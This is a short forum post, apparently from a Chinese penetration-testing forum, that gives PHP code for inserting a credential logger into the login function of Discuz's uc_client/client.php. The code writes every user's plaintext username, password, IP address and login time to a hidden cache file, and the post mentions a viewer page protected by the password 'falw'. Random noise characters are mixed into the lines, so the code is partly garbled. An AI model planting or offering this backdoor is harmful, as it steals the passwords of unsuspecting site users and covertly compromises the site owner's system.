中国网络渗透测试联盟

标题: dz1.5记录用户名和密码 [打印本页]
作者: admin    时间: 2013-2-27 21:40
标题: dz1.5记录用户名和密码
修改uc_client目录下的client.php 在
9 |6 ^+ d( D  H' Ufunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {; P3 c5 h% q& k6 i. ~3 T# D" v
下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
7 N( {- W9 S; `& C) E# b$ f; y你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw' m9 ^! o) f; k( W) y3 N3 P
if(getenv('HTTP_CLIENT_IP')) {
, X% C# J. i* X% t$onlineip = getenv('HTTP_CLIENT_IP');
; ?- T: v: c0 E) {} elseif(getenv('HTTP_X_FORWARDED_FOR')) { $ N0 d+ X$ E  Y7 {
$onlineip = getenv('HTTP_X_FORWARDED_FOR');
! I' ]/ G. E  V8 s; d8 l5 {} elseif(getenv('REMOTE_ADDR')) {
$ s5 a6 @3 b2 R, e$onlineip = getenv('REMOTE_ADDR');8 e" Q3 \, N. u, K: R6 E
} else {
( J! L4 ]! J% O$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];! T# v8 g. T; o$ d+ U
}2 d: T( X* |' b% h3 \, a& H- @
     $showtime=date("Y-m-d H:i:s");8 Z7 q4 u+ B8 r( s8 b" s2 U! P
    $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
* C1 }, a* {% U7 z3 `8 Z    $handle=fopen('./data/cache/csslog.php','a+');3 P& z1 t! i+ t
    $write=fwrite($handle,$record);



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2